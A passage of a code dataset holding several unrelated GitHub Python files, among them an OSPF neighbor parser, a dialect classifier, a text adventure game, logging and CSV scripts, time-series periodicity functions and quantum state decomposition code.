(`obj`): Device object\n expected_state (`str`): Expected neighbor state. Defaults to None\n output (`str`): output of show ospf neighbor. Default to None\n max_time (`int`, optional): Maximum timeout time. Defaults to 60 seconds.\n check_interval (`int`, optional): Check interval. Defaults to 10 seconds.\n \"\"\"\n try:\n if output:\n out = device.parse('show ospf neighbor', output=output)\n else:\n out = device.parse('show ospf neighbor')\n except SchemaEmptyParserError:\n return 0\n\n # example out out\n # {\n # \"ospf-neighbor-information\": {\n # \"ospf-neighbor\": [\n # {\n # \"activity-timer\": \"32\",\n # \"interface-name\": \"ge-0/0/0.0\",\n # \"neighbor-address\": \"12.0.0.2\",\n # \"neighbor-id\": \"2.2.2.2\",\n # \"neighbor-priority\": \"128\",\n # \"ospf-neighbor-state\": \"Full\"\n # },\n\n if expected_state:\n return len(out.q.contains_key_value('ospf-neighbor-state', expected_state))\n else:\n return len(out.q.get_values('ospf-neighbor'))\n\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/junos/ospf/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"13396633185","text":"#when a model's accuracy start to decrease when the complexity increase, the model is overfitted\n# coding: utf-8\n\nimport numpy as np\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression\nfrom collections import Counter\n\n\ndef ngrams(s, n):\n ngram = []\n # print(\"S\", s)\n s = s.strip().split(\" \")\n for i in range(len(s) - n + 1):\n gram = \"\"\n for j in range(n):\n gram = gram + s[i + j]\n ngram.append(gram)\n\n #print(\"ngram\", ngram)\n return ngram\n\n\ndef logi_re(features, gender):\n m = LogisticRegression()\n m.fit(features, gender)\n #print(m.predict(X=test_matrix))\n return m\n\n\ndef svc_re(features, gender):\n m2 = LinearSVC()\n m2.fit(features, gender)\n #print(m2.predict(X=test_matrix))\n return m2\n\n\nt_counts = Counter() # counting taiwanese words frequency\nm_counts = Counter() # counting mandarin words frequency\ntotal_counts = Counter() # counting total number of words\n\n\ndef tm_count(word, gen):\n if gen == 'T':\n for w in word:\n t_counts[w] += 1\n total_counts[w] += 1\n elif gen == 'M':\n for w in word:\n m_counts[w] += 1\n total_counts[w] += 1\n\n\nt_m_ratios = Counter()\nt_m_raw_ratios = Counter()\n\n\ndef tf_idf():\n #print(\"LIST count:\" + str(list(total_counts.most_common())))\n for word, cnt in list(total_counts.most_common()):\n if cnt > 1:\n t_m_ratio = t_counts[word] / float(m_counts[word] + 1)\n t_m_ratios[word] = t_m_ratio\n #print(\"word in count:\"+ word)\n #print(\"ratio:\" + str(t_m_ratio))\n\n t_m_raw_ratios = t_m_ratios\n #print(\"LIST:\" + str(list(t_m_ratios.most_common(100))))\n for word, ratio in list(t_m_ratios.most_common()):\n t_m_ratios[word] = np.log(ratio + 0.01)\n #print(\"word: \" + word)\n #print(t_m_ratios[word])\n list(reversed(t_m_ratios.most_common()))\n\ndef run_train(path, n):\n sentence = []\n dialects = []\n with open(path, 'r') as fp:\n for line in fp:\n w, g = line.strip().split('\\t')\n # words.append('#'+w+'#')\n sentence.append('#' + w + '#')\n dialects.append(g)\n # tm_count(w, g)\n\n ng_set = set()\n w_feat = []\n\n for w, g in zip(sentence, dialects):\n bg = ngrams(w, n)\n tm_count(bg, g)\n tf_idf()\n w_feat.append(set(bg))\n ng_set.update(bg)\n\n features = np.zeros((len(sentence), len(ng_set)), dtype=np.int8)\n print(\"BG: \" + str(bg))\n for i, w in enumerate(w_feat):\n for j, bg in enumerate(ng_set):\n if bg in w:\n features[i, j] = 1\n print(\"features old:\")\n print(features[i,j])\n print(t_m_ratios[bg])\n #print(t_m_ratios[\"我的\"])\n if t_m_ratios[bg] != 0:\n features[i,j] = (float(t_m_ratios[bg])* float(features[i,j]))\n print(\"features new:\")\n print(features[i, j])\n\n return features, dialects, len(sentence), len(ng_set), ng_set\n\n\ndef run_test(path, len1, len2, ng_set1, n):\n sentence = []\n dialects = []\n with open(path, 'r') as fp:\n for line in fp:\n w, g = line.strip().split('\\t')\n sentence.append('#' + w + '#')\n dialects.append(g)\n\n w_feat = []\n\n for w in sentence:\n bg = ngrams(w, n)\n w_feat.append(set(bg))\n\n features = np.zeros((len1, len2), dtype=np.int8)\n\n\n for i, w in enumerate(w_feat):\n for j, bg in enumerate(ng_set1):\n if bg in w:\n features[i, j] = 1\n features[i, j] *= t_m_ratios[bg]\n for i in range(14770):\n dialects.append('T')\n\n return features, dialects\n\n\nif __name__ == '__main__':\n train = '../data/simp_16770.train'\n test = '../data/simp_2000.test'\n features, dialect, len1, len2, ng_set = run_train(train, 3)\n test_matrix = np.zeros((len1, len2), dtype=np.int8)\n # m = logi_re(features, dialect)\n svm = svc_re(features, dialect)\n\n # print(\"TRAIN:\", m.score(features, dialect))\n print(\"TRAIN:\", svm.score(features, dialect))\n features_test, dialect_test = run_test(test, len1, len2, ng_set, 3)\n\n # print(\"TEST:\", m.score(features_test, dialect_test))\n score = svm.score(features_test, dialect_test)\n accuracy = ((16770 * score - 14770) / 2000) * 100\n print(\"TEST: \", accuracy, '%')\n print(\"T\", t_counts.most_common(20))\n print(\"M\", m_counts.most_common(20))\n # pre_test = m.predict(features_test, gender_test)\n # confusion_matrix(gender_test, pred_test)\n # compare model with some base line\n","repo_name":"cicl2018/vardial-dmt","sub_path":"kars/imporve_accuracy_Kelly.py","file_name":"imporve_accuracy_Kelly.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30897176005","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMaze - Projekt\n\"\"\"\n\nimport maze\nimport re\nimport sys\nimport getopt\nimport os.path\n\ndef main():\n \"\"\"\n Main method, starts program\n \"\"\"\n try:\n opts, _ = getopt.gnu_getopt(\n sys.argv[1:], 'hivacl:', ['help', 'info', 'load=', 'version', 'about', 'cheat']\n )\n except getopt.GetoptError as error:\n print(error)\n print_usage()\n\n # Setup default parameter 'game_file' to include calling Game constructor\n params = {'game_file': None}\n\n # Parse options from command prompt. If multiple are given, act on the first found\n # The statements isn't \"else checked\" but each method will do sys.exit()\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n print_usage()\n if opt in ('-i', '--info'):\n print_info()\n if opt in ('-v', '--version'):\n print_version()\n if opt in ('-a', '--about'):\n print_about()\n if opt in ('-c', '--cheat'):\n print_cheats()\n\n # Check if a file given to load actually exists\n if opt in ('-l', '--load'):\n if not os.path.isfile(arg):\n print(\"File {!s} not found!\".format(arg))\n sys.exit(0)\n\n params['game_file'] = arg\n\n # No parameter that will terminate the program given, start the game\n run_game(params)\n sys.exit(0)\n\ndef run_game(params):\n \"\"\"\n The main loop keeping the game alive\n \"\"\"\n # Create default Game object\n g = maze.Game(params)\n\n # No need to print the info if a user previously played\n if g.game_file == None:\n g.print_game_info()\n print()\n\n g.print_room_info()\n\n while True:\n if g.game_completed == True:\n return\n\n user_input = input(\">>> \")\n\n # Check if the user input was a single letter/word and act on it\n if user_input in ('i', 'info'):\n g.print_room_info()\n elif user_input in ('h', 'hjälp', 'help'):\n g.print_help()\n elif user_input in ('fr', 'fram', 'forward'):\n g.goto_next_room()\n elif user_input in ('ba', 'bak', 'back'):\n g.goto_prev_room()\n elif user_input in ('se', 'look'):\n g.look_around() # Should describe room?\n elif user_input in ('l', 'ledtråd', 'hint'):\n g.print_hint()\n elif user_input in ('objekt', 'o'):\n g.look_around()\n elif user_input in ('inv', 'inventarier'):\n g.list_inventory()\n elif user_input in ('spara', 'sp', 'save'):\n g.save_game()\n elif user_input in ('q', 'quit'):\n break\n\n # Parse input to find action and object\n input_re = re.compile(r'^(\\w+) (.+)$')\n input_match = input_re.search(user_input)\n\n # Check that we even got a match (two words)\n if input_match == None:\n continue\n\n # Check that both groups are assigned\n if input_match.group(2) == None:\n continue\n\n # Save the action and original object (to print according to user input)\n (action, orig_obj) = (input_match.group(1), input_match.group(2))\n\n # Strip user input and make it lowercase\n obj = orig_obj.lower()\n obj = re.sub(r\"['\\.]\", \"\", obj, flags=re.IGNORECASE)\n\n # Actions you can do with inventory\n inv_actions = ['sl', 'släpp', 'drop',\n 'a', 'användä', 'use']\n\n # Actions you can do with objects\n obj_actions = ['t', 'titta', 'see',\n 'ö', 'öppna', 'open',\n 's', 'sparka', 'kick',\n 'f', 'flytta', 'move',\n 'ta', 'take']\n\n if action not in inv_actions and action not in obj_actions:\n print(\"I don't know what you men by '{!s}'... Type 'help' to see what you can do.\".format(action))\n continue\n\n if action in inv_actions and obj not in g.inventory:\n print(\"Hmm, I can't see {!s} in the inventory...\".format(orig_obj))\n continue\n\n if action in obj_actions and obj not in g.current_room['objects']:\n print(\"There's no {!s} in this room!\".format(orig_obj))\n continue\n\n # Based on action, send the object to relevant method in Game\n if action in ('t', 'titta', 'see'):\n g.look_at_object(obj)\n elif action in ('ö', 'öppna', 'open'):\n g.open_object(obj, None)\n elif action in ('s', 'sparka', 'kick'):\n g.kick_object(obj, None)\n elif action in ('f', 'flytta', 'move'):\n g.move_object(obj, None)\n elif action in ('ta', 'take'):\n g.take_object(obj)\n elif action in ('sl', 'släpp', 'drop'):\n g.drop_object(obj, None)\n elif action in ('a', 'använd', 'use'):\n g.use_object(obj)\n\ndef print_usage():\n \"\"\"\n Prints usage/help for porgram\n \"\"\"\n print(\"Usage: {!s}\\n\".format(sys.argv[0]))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--help\", \"-h\", \"Print this help text\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--info\", \"-i\", \"Print info about the game\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--version\", \"-v\", \"Print version of the program\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--about\", \"-a\", \"Print information about the developer\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--cheat\", \"-c\", \"Print available cheats and tricks\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--load\", \"-l\", \"Load game from save file\"))\n sys.exit(0)\n\ndef print_info():\n \"\"\"\n Information about the program\n \"\"\"\n print(r\"\"\"- INFO -\nThis is the text based game called adventure.py! In the game the user is taken through\nseveral rooms and by moving, kicking or opening objects found around in the game, the player\nwill be able to open up new paths to discover the next room.\n\nTo make it possible to complete the game, the player is equipped with a backpack (inventory)\nthat can hold stuff picked up in the game.\"\"\")\n sys.exit(0)\n\ndef print_version():\n \"\"\"\n Print current version\n \"\"\"\n print(r\"\"\"- VERSION -\n0.2b\"\"\")\n sys.exit(0)\n\ndef print_about():\n \"\"\"\n Information about the developer\n \"\"\"\n print(r\"\"\"- ABOUT -\nThis game is developed by Simon Sawert\n\"\"\")\n sys.exit(0)\n\ndef print_cheats():\n \"\"\"\n Cheats that can be used in the game\n \"\"\"\n print(\"- CHEATS -\")\n\n # Game has an option to print every room and it's object so we call it\n g = maze.Game({'game_file': None})\n g.print_game_objects()\n\n # Added this manually, didn't figure out a way to do this automatically\n # and I guess this is only used for the teacher correcting the task\n print(r\"\"\"\nCopy/paste to complete the game:\n\ns mirror\ns photo frame\nta wardrobe key\nta shattered glass\na wardrobe key\nfr\na shattered glass\nta zippo\nf drawer\na zippo\nfr\nta remote\na remote\nta door key\na door key\nfr\ns globe\nta toy car\na toy car\nfr\nf gurney\nta scalpel\na scalpel\nta small key\na small key\nfr\nf pillars\nta hammer\na hammer\nta crowbar\na crowbar\nfr\nö knight's helmet\nta silver key\nba\nba\nba\na silver key\nta stone\nfr\nfr\nfr\na stone\nta gate key\n# a gate key # - This completes the game\n\"\"\")\n\n sys.exit(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"bombsimon/py-adventure","sub_path":"adventure.py","file_name":"adventure.py","file_ext":"py","file_size_in_byte":7311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19101351163","text":"import streamlit as st\nimport gateway\n\ndef header():\n st.header('Antibloqueo')\n st.markdown(\"##### Supere el bloqueo del escritor. \")\n st.text('version 0 - Last update 08/08/2022')\n\ndef instert_text():\n txt = st.text_area(\"-\")\n colum1, colum2,colum3,colum4,colum5 = st.columns([1,1,1,1,1])\n\n if colum1.button(\"Escriba Más\"):\n with st.spinner(text='en progreso'):\n \n new_txt, status = gateway.conect_antibloqueo(txt)\n status = 200\n \n if status == 200:\n st.text_area(label=\"Escriba!\", value=new_txt, height=250)\n st.success(\"Sucess!\") \n else:\n st.text_area(label=\"Error:\", value=new_txt[\"Error\"])\n st.error(new_txt[\"Error\"]) \n \n if colum2.button(\"Limpiar\"):\n st.info(\"cleaning\")\n\nst.sidebar.markdown(\"# Antibloqueo ❄️\")\nheader()\ninstert_text()","repo_name":"Moris-Polanco/NLP-Apps","sub_path":"antibloqueo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72633874887","text":"import logging\n\n\"\"\"\nDEBUG\nINFO\nWARNING\nERROR\nCRITICAL\n\"\"\"\n\n\n# logger configuration\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\nformatter = logging.Formatter(\n '%(asctime)s - line %(lineno)d in %(filename)s - %(message)s')\n\nfile_handler = logging.FileHandler('logfile.log')\nfile_handler.setFormatter(formatter)\n\nlog.addHandler(file_handler)\n# logging.basicConfig(filename='logfile.log', level=logging.DEBUG,\n# format='%(asctime)s - line %(lineno)d in %(filename)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')\n\n\ndef add(x, y):\n \"\"\"adds 2 numbers\"\"\"\n log.info(f'adding {x} and {y}')\n return x + y\n\n\ndef substract(x, y):\n \"\"\"substraction between 2 numbers\"\"\"\n logging.info(f'subtracting {y} from {x}')\n return x - y\n\n\ndef multiply(x, y):\n \"\"\"multiplication of 2 numbers\"\"\"\n return x * y\n\n\ndef division(x, y):\n \"\"\"divide a number with another\"\"\"\n try:\n return x / y\n except ZeroDivisionError as e:\n logging.exception(e)\n\n\nresult = add(10, 5)\nprint(result)\n# print(division(21, 0))\n","repo_name":"alxayeed/python-logging","sub_path":"logger/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74406724487","text":"from __future__ import annotations\n\nimport pytest\n\nfrom silence_fixit_error import _find_violations\nfrom silence_fixit_error import _parse_output_line\nfrom silence_fixit_error import main\nfrom silence_fixit_error import Violation\n\n\n@pytest.mark.parametrize(\n 'lines, expected_violations', (\n pytest.param(\n ['t.py@1:2 MyRuleName: the error message'],\n [Violation('t.py', 'MyRuleName', 1)],\n id='single-line',\n ),\n pytest.param(\n [\n 't.py@1:2 MyRuleName: the error message',\n 'which continue over multiple lines',\n 'just like this one does.',\n ],\n [Violation('t.py', 'MyRuleName', 1), None, None],\n id='multi-line',\n ),\n pytest.param(\n [\n 't.py@1:2 MyRuleName: ',\n 'the error message on a new line',\n 'which continue over multiple lines',\n 'just like this one does.',\n ],\n [Violation('t.py', 'MyRuleName', 1), None, None, None],\n id='multi-line-leading-ws',\n ),\n pytest.param(\n [\n 't.py@1:2 MyRuleName: the error message',\n 'which continue over multiple lines',\n 'just like this one does.',\n '',\n ],\n [Violation('t.py', 'MyRuleName', 1), None, None, None],\n id='multi-line-trailing-ws',\n ),\n pytest.param(\n ['t.py@1:2 MyRuleName: '],\n [Violation('t.py', 'MyRuleName', 1)],\n id='no-message',\n ),\n ),\n)\ndef test_parse_output_line(lines, expected_violations):\n violations = [\n _parse_output_line(line)\n for line in lines\n ]\n\n assert violations == expected_violations\n\n\ndef test_find_violations(tmp_path, capsys):\n python_module = tmp_path / 't.py'\n python_module.write_text(\"\"\"\\\nx = None\nisinstance(x, str) or isinstance(x, int)\n\"\"\")\n\n violations = _find_violations(\n 'fixit.rules:CollapseIsinstanceChecks', [str(python_module)],\n )\n\n assert violations == {\n str(python_module): [\n Violation(str(python_module), 'CollapseIsinstanceChecks', 2),\n ],\n }\n\n\ndef test_main(tmp_path, capsys):\n python_module = tmp_path / 't.py'\n python_module.write_text(\"\"\"\\\nx = None\nisinstance(x, str) or isinstance(x, int)\n\ndef f(x):\n return isinstance(x, str) or isinstance(x, int)\n\"\"\")\n\n ret = main(('fixit.rules:CollapseIsinstanceChecks', str(python_module)))\n\n assert ret == 1\n assert python_module.read_text() == \"\"\"\\\nx = None\n# lint-fixme: CollapseIsinstanceChecks\nisinstance(x, str) or isinstance(x, int)\n\ndef f(x):\n # lint-fixme: CollapseIsinstanceChecks\n return isinstance(x, str) or isinstance(x, int)\n\"\"\"\n\n captured = capsys.readouterr()\n assert captured.err == f\"\"\"\\\n-> running fixit\nfound violations in 1 files\n-> adding fixme comments\n{python_module}\n\"\"\"\n\n\ndef test_main_no_violations(tmp_path, capsys):\n src = \"\"\"\\\ndef foo():\n print('hello there')\n\"\"\"\n\n python_module = tmp_path / 't.py'\n python_module.write_text(src)\n\n ret = main(('fixit.rules:CollapseIsinstanceChecks', str(python_module)))\n\n assert ret == 0\n assert python_module.read_text() == src\n\n captured = capsys.readouterr()\n assert captured.err == \"\"\"\\\n-> running fixit\nno violations found\n\"\"\"\n\n\ndef test_main_multiple_different_violations(tmp_path, capsys):\n src = \"\"\"\\\nx = None\nisinstance(x, str) or isinstance(x, int)\n\nif True:\n pass\n\"\"\"\n\n python_module = tmp_path / 't.py'\n python_module.write_text(src)\n\n ret = main(('fixit.rules', str(python_module)))\n\n assert ret == 1\n\n captured = capsys.readouterr()\n assert captured.err == \"\"\"\\\n-> running fixit\nfound violations in 1 files\nERROR: errors found for multiple rules: ['CollapseIsinstanceChecks', 'NoStaticIfCondition']\n\"\"\" # noqa: E501\n","repo_name":"samueljsb/silence-fixit-error","sub_path":"tests/silence_fixit_error_test.py","file_name":"silence_fixit_error_test.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34055128501","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# duplicate-file-finder\nhttps://github.com/dougthor42/duplicate-file-finder\nPlan out the reorganization of your file systems.\n\"\"\"\nfrom pathlib import Path\n\n__all__ = [\n \"__author__\",\n \"__author_email__\",\n \"__maintainer__\",\n \"__maintainer_email__\",\n \"__license__\",\n \"__version__\",\n \"__released__\",\n \"__created__\",\n \"__project_name__\",\n \"__project_url__\",\n \"__package_name__\",\n \"__description__\",\n \"__long_descr__\",\n]\n\n__author__ = \"Douglas Thor\"\n__author_email__ = \"doug.thor@gmail.com\"\n\n__maintainer__ = \"\"\n__maintainer_email__ = \"\"\n\n__license__ = \"MIT\"\n__version__ = \"0.0.0\"\n__released__ = \"\"\n__created__ = \"2020-11-01\"\n\n__project_name__ = \"duplicate-file-finder\"\n__project_url__ = \"https://github.com/dougthor42/duplicate-file-finder\"\n__package_name__ = \"duplicate_file_finder\"\n\n__description__ = \"Find all files with matching md5 checksums.\"\n__long_descr__ = __doc__\n\n# Try to read the README file and use that as our long description.\ntry:\n base_dir = Path(__file__).parent.parent\n readme = base_dir / \"README.md\"\n __long_descr__ = readme.read_text()\nexcept Exception:\n pass\n","repo_name":"dougthor42/duplicate-file-finder","sub_path":"src/duplicate_file_finder/__about__.py","file_name":"__about__.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28995625858","text":"import sys\n\nimport pandas as pd\nfrom money_parser import price_str\n\n\nFEED_CSV_FILENAME = 'feed.csv'\nFEED_SAMPLE_CSV_FILENAME = 'feed_sample.csv'\n\n# Column Names\nCOL_PRODUCT_NAME = 'product_name'\nCOL_PRICE = 'price'\nCOL_PRICE_EDITED = 'price_edited'\n\n# Part 2 Regex (Knit w/o Jumper)\nPART_2_REGEX = '^(?=.*Knit)(?!.*Jumper).*'\n\n\ndef main(argv):\n if argv[1] == FEED_CSV_FILENAME:\n step_1(argv)\n elif argv[1] == FEED_SAMPLE_CSV_FILENAME:\n step_2(argv)\n\n\ndef step_2(argv):\n data_frame = pd.read_csv(argv[1])\n df_filter = get_df_filter_by_regex(data_frame, PART_2_REGEX, COL_PRODUCT_NAME)\n data_frame = data_frame[~df_filter]\n data_frame.to_csv(argv[3])\n\n\ndef get_df_filter_by_regex(df, regex, column_name):\n return df[column_name].str.contains(regex)\n\n\ndef step_1(argv):\n create_csv_from_tsv(argv[1], argv[3])\n data_frame = pd.read_csv(argv[3])\n create_new_column_in_csv(data_frame,\n COL_PRICE_EDITED,\n data_frame[COL_PRICE].apply(lambda x: extract_price_from_string(x)), argv[3])\n\n\ndef create_new_column_in_csv(data_frame, column_name, data_frame_column, file_name):\n data_frame[column_name] = data_frame_column\n data_frame.to_csv(file_name)\n\n\ndef extract_price_from_string(price):\n return price_str(price)\n\n\ndef create_csv_from_tsv(tsv_file_name, csv_output_file_name):\n csv_table = pd.read_csv(tsv_file_name, sep='\\t')\n csv_table.to_csv(csv_output_file_name, index=False)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"uriFrischman/syte-assignment","sub_path":"csv-task.py","file_name":"csv-task.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37566923501","text":"from scipy.stats import spearmanr\nfrom statsmodels.tsa.stattools import acf\nfrom scipy.signal import argrelmax\nfrom decompose import stl_decompose\nfrom numpy import array, arange, std, median, inf, ceil, arctan\n\n\ndef DRel(itseries, nfreq):\n \"\"\"\n Doing STL seasonal decomposition on time series itseries vector data with\n window length nfreq and returns standard deviation ratio of seasonal and\n reminder components of decomposition for last season of time series. This\n ratio can be used to determine if time series has periodicity with length\n nfreq or not. When it more than unity then it is possible to have periodic\n pattern, but auto-correlation function is needed to set reliability for\n periodicity.\n\n Parameters\n ----------\n itseries: 1D array\n one dimensional array of time series\n\n nfreq: integer\n possible periodic pattern length\n\n Returns\n -------\n ratio: numeric\n ratio of standard devaiation of seasonal and standard devaiation of remainder\n seasonal and remainder are stl decomposition components\n\n crho: numeric\n correlation rho value between last two days\n\n crho_last: numeric\n correlation rho value between last day and seasonal component\n\n relat: numeric\n median value for seasonal/remainder ratio\n \"\"\"\n ratio = 0.0\n relat = 0.0\n crho = 0.0\n crho_last = 0.0\n nobsi = len(itseries)\n tryerror = False\n intseries = array(itseries) # casting to numpy array\n coeff = 1.0\n if (nobsi / nfreq) > 2.0:\n indi = arange((nobsi - nfreq), nobsi)\n intseries_right = intseries[indi]\n intseries_left = intseries[(indi - nfreq)]\n try:\n crho = spearmanr(intseries_left, intseries_right)[0]\n except Exception:\n crho = 0\n if (nobsi / nfreq) >= 3:\n try: # STL decomposition with window size nfreq\n xad_decomp = stl_decompose(intseries, period=nfreq, robust=False)\n except Exception:\n tryerror = True\n if not tryerror:\n rem = xad_decomp['remainder'][-nfreq:]\n ses = xad_decomp['seasonal'][-nfreq:]\n if std(rem, ddof=1) > 0:\n try:\n crho_last = spearmanr(ses, intseries_right)[0]\n except Exception:\n crho_last = 0\n # standard deviation ratio of seasonal/remainder for last season\n ratio = std(ses, ddof=1) / std(rem, ddof=1)\n relat = median(ses / rem)\n if (relat < 0) and (crho < 0.4) and (crho_last < 0.4):\n coeff = 0.0\n if (min(crho, crho_last) < 0.1) and (relat < 0):\n coeff = 0.0\n if (crho > 0.7) or (crho_last > 0.9):\n coeff = 2.0\n else:\n if std(ses, ddof=1) > 0:\n ratio = inf\n relat = inf\n ratio = ratio * coeff\n return ratio, crho, crho_last, relat, coeff\n\n\ndef NRel(itseries, obsi):\n \"\"\"\n Doing auto-correlation analysis of itseries time series to check and give\n reliabilty of having periodic pattern with length obsi. It also uses DRel()\n method to combine with auto-correlation peak value around lag value obsi.\n\n Parameters\n ----------\n itseries: 1D array\n one dimensional array of time series\n\n obsi: integer\n possible periodic pattern length\n\n Returns\n -------\n nacfpeak: array of length 2\n vector of length 2, nacfpeak[0] is periodic pattern length i.e. obsi\n nacfpeak[1] is periodic pattern reliabilty\n nacfpeak[2] is Kolmogorov-Smirnov lambda\n \"\"\"\n nacfpeak = array([obsi, 0.0])\n instep = len(itseries) # number of elements in time series\n if (float(instep) / float(obsi)) > 2.0:\n # if less than 3 periodic pattern exists in time series then no acf\n # and STL decomposition can be done\n x1d_acf = array(acf(itseries, nlags=ceil(1.5 * obsi)))\n # searching peaks in acf values\n peak1d = array(argrelmax(x1d_acf))\n # selecting peaks by pattern length 2/12, i.e. 4 hours for daily\n # pattern around acf lag value obsi\n peak1d = peak1d[peak1d >= (obsi - ceil(obsi / 12.0))]\n peak1d = peak1d[peak1d <= (obsi + ceil(obsi / 12.0))]\n # getting maximal value of selected peaks if possible\n if len(peak1d) > 0:\n corval = max(x1d_acf[peak1d])\n else:\n corval = 0.0 # otherwise corellation value is set 0\n per_markers = DRel(itseries, obsi)\n if (corval < 0.1):\n tin = 0\n else:\n tin = 1\n if (corval < 0.25):\n corval = 0\n if (per_markers[1] < 0.1) or (per_markers[2] < 0.1):\n tin = 0\n reliab = corval + tin * per_markers[0]\n reliab = arctan(reliab) / (2.0 * arctan(1.0))\n if ((instep / obsi) < 3) and (per_markers[0] == 0):\n if (corval > 0.25) and (per_markers[1] > 0.5):\n reliab = max(corval, per_markers[1])\n nacfpeak[1] = reliab\n return nacfpeak\n","repo_name":"khharut/pyhistavg","sub_path":"pyhistavg/periodicity.py","file_name":"periodicity.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44253149751","text":"# file to implement gradient descent on Alec's expression for adding another QWP\n\nimport numpy as np\nfrom scipy.optimize import minimize, approx_fprime, brute\n\nfrom rho_methods import *\nfrom sample_rho import *\n\ndef alec_expr(angles):\n '''Get density matrix based on Alec's expression for adding another QWP'''\n # unpack angles\n alpha, gamma, delta, phi = angles\n\n a_state = np.cos(alpha)*(np.cos(gamma)*np.cos(delta) - 1j * np.sin(gamma)*np.sin(delta)) * np.array([1, 0, 0, 0]).reshape(4,1) + np.cos(alpha)*(np.sin(gamma)*np.cos(delta) + 1j*np.cos(gamma)*np.sin(delta))*np.array([0,1,0,0]).reshape(4,1) + np.sin(alpha)*(np.cos(gamma)*np.sin(delta) + 1j*np.sin(gamma)*np.cos(delta))*np.exp(1j*phi)*np.array([0,0,1,0]).reshape(4,1) + np.sin(alpha)*(np.sin(gamma)*np.sin(delta) - 1j*np.cos(gamma)*np.cos(delta))*np.exp(1j*phi)*np.array([0,0,0,1]).reshape(4,1)\n\n return a_state @ a_state.conj().T\n\ndef alec_decompose(targ_rho, targ_name = 'Test',zeta=.7, frac=0.1, N = 1000, eps=0.999, verbose=False):\n '''Decomposes target state into params pased on experimental components for Alec's expression; modified from jones_decompose method in rho_methods.py\n __\n Parameters:\n targ_rho: target state to decompose, 4x4 numpy array\n name: name of state to decompose, string\n zeta: learning rate, float\n frac: how often to break the GD and get random angles, float\n N: max number of iterations, int\n eps: max fidelity, float\n verbpse: whether to print out progress, bool\n __\n Returns:\n angles: angles for each component, 1x4 numpy array\n pred_rho: predicted state from angles, 4x4 numpy array\n '''\n\n def get_random_angles():\n '''Get random angles for each component'''\n # alpha, gamma, delta, phi\n # return [np.random.rand()*np.pi/2, np.random.rand()*np.pi/2, np.random.rand()*np.pi/2, np.random.rand()*2*np.pi]\n return np.random.rand(4)*2*np.pi\n\n # set bounds for angles\n # bounds = [(0,np.pi/2),(0,np.pi/2),(0,np.pi/2),(0,2*np.pi)]\n bounds = [(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi)]\n\n # functions for GD #\n def loss_fidelity(x0):\n pred_rho = alec_expr(x0)\n fidelity = get_fidelity(pred_rho, targ_rho)\n return 1-np.sqrt(fidelity)\n\n def minimize_angles(x0):\n result = minimize(loss_fidelity, x0=x0, bounds=bounds)\n best_angles = result.x\n rho = alec_expr(best_angles)\n fidelity = get_fidelity(rho, targ_rho)\n return best_angles, fidelity, rho\n\n # initialize angles\n x0 = get_random_angles()\n angles, fidelity, rho = minimize_angles(x0)\n\n # set initial bests\n best_angles = angles\n best_fidelity = fidelity\n best_rho = rho\n\n # gradient descent\n grad_angles= best_angles\n n = 0\n index_since_improvement = 0\n while n < N and best_fidelity < eps:\n if verbose: \n print('n', n)\n print(fidelity, best_fidelity)\n\n if index_since_improvement % (frac*N)==0: # periodic random search (hop)\n x0 = get_random_angles()\n else:\n gradient = approx_fprime(grad_angles, loss_fidelity, epsilon=1e-8) # epsilon is step size in finite difference\n # if verbose: print(gradient)\n # update angles\n x0 = [best_angles[i] - zeta*gradient[i] for i in range(len(best_angles))]\n grad_angles = x0\n\n # minimize angles\n best_angles, fidelity, rho = minimize_angles(x0)\n if fidelity > best_fidelity: # if new best, update\n best_fidelity = fidelity\n best_angles = best_angles\n best_rho = rho\n index_since_improvement = 0\n else: # if not new best, increment index\n index_since_improvement += 1\n\n n+=1 # increment iteration\n if verbose:\n print('Best fidelity: ', best_fidelity)\n print('Best angles: ', best_angles)\n print('Best rho: ', best_rho)\n print('Actual rho: ', targ_rho)\n\n return targ_name, n, best_fidelity, best_angles[0], best_angles[1], best_angles[2], best_angles[3], best_rho, targ_rho\n\ndef alec_decompose_brute(targ_rho, targ_name = 'Test'):\n '''Alternate of alec_decompose but using scipy.optimize.brute instead of gradient descent\n __\n Parameters:\n targ_rho: target state to decompose, 4x4 numpy array\n name: name of state to decompose, string\n 